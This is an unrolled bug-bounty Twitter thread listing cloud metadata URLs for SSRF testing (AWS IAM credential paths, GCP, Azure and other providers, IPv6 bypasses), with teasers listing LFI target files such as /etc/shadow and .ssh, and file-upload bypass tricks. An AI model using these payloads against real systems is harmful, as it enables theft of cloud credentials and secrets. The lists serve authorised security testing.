Share this page!

Tushar Verma 🇮🇳 Profile picture
Twitter logo
3 Dec, 12 tweets, 4 min read
Cloud Metadata Dictionary useful for SSRF Testing

## IPv6 Tests

http://[::ffff:169.254.169.254]

http://[0:0:0:0:0:ffff:169.254.169.254]

#bugbountytips #bugbounty #bugbountytip
## AWS

# Amazon Web Services (No Header Required)

# from docs.aws.amazon.com/AWSEC2/latest/…

http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy

http://169.254.169.254/latest/user-data

http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]

http://169.254.169.254/latest/meta-data/ami-id

http://169.254.169.254/latest/meta-data/reservation-id

http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key

# ECS Task : docs.aws.amazon.com/AmazonECS/late…

http://169.254.170.2/v2/credentials/
## Google Cloud (Header Sometimes Required)

# - Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" on API v1

# - Most endpoints can be accessed via the v1beta API without a header

http://169.254.169.254/computeMetadata/v1/
metadata.google.internal/computeMetadata/v1/

http://metadata/computeMetadata/v1/

metadata.google.internal/computeMetadata/v1/instance/hostname

metadata.google.internal/computeMetadata/v1/instance/id
## Digital Ocean (No Header Required)

# developers.digitalocean.com/documentation/…

http://169.254.169.254/metadata/v1.json

http://169.254.169.254/metadata/v1/

http://169.254.169.254/metadata/v1/id

http://169.254.169.254/metadata/v1/user-data
http://169.254.169.254/metadata/v1/hostname

http://169.254.169.254/metadata/v1/region

http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address
# Azure (Header Required)

# Header: "Metadata: true"

# docs.microsoft.com/en-us/azure/vi…

http://169.254.169.254/metadata/instance?api-version=2017-04-02

http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
# Oracle Cloud (No Header Required)

# docs.us-phoenix-1.oraclecloud.com/Content/Comput…

http://169.254.169.254/opc/v1/instance/
## Alibaba

# alibabacloud.com/help/faq-detai…

http://100.100.100.200/latest/meta-data/

http://100.100.100.200/latest/meta-data/instance-id

http://100.100.100.200/latest/meta-data/image-id
## Kubernetes

# Debug Services (kubernetes.io/docs/tasks/deb…)

https://kubernetes.default.svc.cluster.local

https://kubernetes.default

#

https://kubernetes.default.svc/metrics

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with Tushar Verma 🇮🇳

Tushar Verma 🇮🇳 Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @e11i0t_4lders0n

Tushar Verma 🇮🇳 Profile picture
9 Nov
AWS Security Testing Checklist

=Identity and Access Management

1-Ensure multi-factor authentication (MFA) is enabled for all IAM users that have a console password
2-Ensure credentials unused for 90 days or greater are disabled
3-Ensure access keys are rotated every 90 days or less
4-Ensure IAM password policy requires at least one uppercase letter
5-Ensure IAM password policy requires at least one lowercase letter
6-Ensure IAM password policy requires at least one symbol
7-Ensure IAM password policy requires at least one number
8-Ensure IAM password policy requires minimum length of 14 or greater
9-Ensure no root account access key exists
10-Ensure MFA is enabled for the "root" account
Read 14 tweets
Tushar Verma 🇮🇳 Profile picture
5 Nov
If an LFI vulnerability exists, look for these files:

1-Linux system and user files:
/etc/passwd
/etc/shadow
/etc/issue
/etc/group
/etc/hostname
/home/user/
/home/user/.ssh
/home/user/bash_history

#bugbounty #bugbountytip #bugbountytips
2-Log files:
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/httpd/access_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/httpd/error_log
3-CMS configuration files:
WordPress: /var/www/html/wp-config.php
Joomla: /var/www/configuration.php
Dolphin CMS: /var/www/html/inc/header.inc.php
Drupal: /var/www/html/sites/default/settings.php
Mambo: /var/www/configuration.php
PHPNuke: /var/www/config.php
Read 5 tweets
Tushar Verma 🇮🇳 Profile picture
5 Nov
DevSecOps Automation

1-Static Application Security Testing (SAST)
-SonarQube
-CxSAST (Checkmarx)
-Fortify
-Veracode Static Analysis (Veracode)
2-Software composition analysis (SCA)
-Blackduck
-WhiteSource
-Snyk
-Threatwatch
-CAST Highlight
-Dependency-Track
-Veracode Software Composition Analysis
-Whitehat Sentinel SCA Essentials
3-Dynamic application security testing (DAST)
-Acunetix WVS
-IBM Appscan
-Netsparker
-Burp Suite
Read 7 tweets
Tushar Verma 🇮🇳 Profile picture
4 Nov
AWS Security Best Practices

1-Identify Security Requirements
-Define and Categorize Assets in AWS
-Create Classifications for Data and Applications
2-Deploy Solutions Designed to Solve Cloud Security Challenges
-Manage Cloud Access: Limiting
-Use Cloud-Native Security Solutions
-Protect All Your Perimeters and Segment Everything
-Maintain a Consistent Security Posture Throughout AWS Deployments
-Manage AWS accounts, IAM Users, Groups, and Roles
-Manage Access to Amazon EC2 Instances

3-Protect AWS Workloads
-Implement Cloud Workload Protection for Serverless and Containers
-Implement Proactive Cloud Security
-Define Incident Response Policies and Procedures
Read 4 tweets
Tushar Verma 🇮🇳 Profile picture
28 Sep
File Upload Restriction Bypass Checklist

1-Try various file extensions-Try different versions of the file extensions, for example php3, .php4, .php5, phtml for PHP scripts, asp,aspx

#bugbounty #bugbountytip #bugbountytips
2-Append an extra file extension-If the application is not properly validating for the file extension, this can be exploited by appending another extension, for example from script.php to script.php.gif or script.gif.php
3-Change the casing of the extension-Try different combinations of lower and upper case, for example pHp, PhP, phP, Php etc
Read 13 tweets

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us on Twitter!

Like this author's thread?

Get emails when @e11i0t_4lders0n has new unrolls!

Check out other threads from @e11i0t_4lders0n!

Read all threads by @e11i0t_4lders0n

:(